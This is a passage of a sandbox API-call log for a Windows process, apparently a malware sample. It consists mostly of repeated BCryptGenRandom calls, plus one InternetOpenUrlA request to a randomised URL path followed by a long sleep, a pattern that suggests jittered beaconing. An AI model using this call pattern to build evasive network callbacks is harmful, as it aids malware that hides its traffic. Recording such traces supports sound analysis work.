0x0 [0177.876] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.876] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.877] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.877] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.877] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.877] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0177.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0177.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0177.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0178.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b42a, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x3a1b42a) returned 0x0 [0178.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0178.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0178.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0178.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.140] GetProcessHeap () returned 0x440000 [0178.140] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473350 [0178.140] lstrcpyA (in: lpString1=0x473350, lpString2="\x10´¡\x03" | out: lpString1="\x10´¡\x03") returned="\x10´¡\x03" [0178.140] lstrcatA (in: lpString1="\x10´¡\x03", lpString2="/hr0pz0nVl10jbqFrOkjzq0si/9ez8eSKdo8j4snPsx3U2imHq5ikydiAynzhbR2fIgthacp/" | out: lpString1="\x10´¡\x03/hr0pz0nVl10jbqFrOkjzq0si/9ez8eSKdo8j4snPsx3U2imHq5ikydiAynzhbR2fIgthacp/") returned="\x10´¡\x03/hr0pz0nVl10jbqFrOkjzq0si/9ez8eSKdo8j4snPsx3U2imHq5ikydiAynzhbR2fIgthacp/" [0178.140] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0178.140] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x10´¡\x03/hr0pz0nVl10jbqFrOkjzq0si/9ez8eSKdo8j4snPsx3U2imHq5ikydiAynzhbR2fIgthacp/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0178.140] GetProcessHeap () returned 0x440000 [0178.140] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473350 | out: hHeap=0x440000) returned 1 [0178.140] GetProcessHeap () returned 0x440000 [0178.140] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b410 | out: hHeap=0x440000) returned 1 [0178.140] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0178.141] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0178.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0178.141] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0178.141] Sleep (dwMilliseconds=0x1c25b) [0178.296] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0178.296] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0178.296] GetProcessHeap () returned 0x440000 [0178.296] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0178.296] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0178.297] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x11, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0178.297] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.297] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0178.297] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.297] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.298] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.298] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.298] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.298] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.298] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.298] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.298] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.298] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.299] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.299] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.299] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.299] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.299] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0178.299] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b262, cbBuffer=0x25, dwFlags=0x2 | out: pbBuffer=0x3a1b262) returned 0x0 [0178.300] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.300] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.300] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.300] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.300] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.301] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.302] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.303] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.303] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0178.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0178.305] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0178.305] BCryptGenRandom (in: 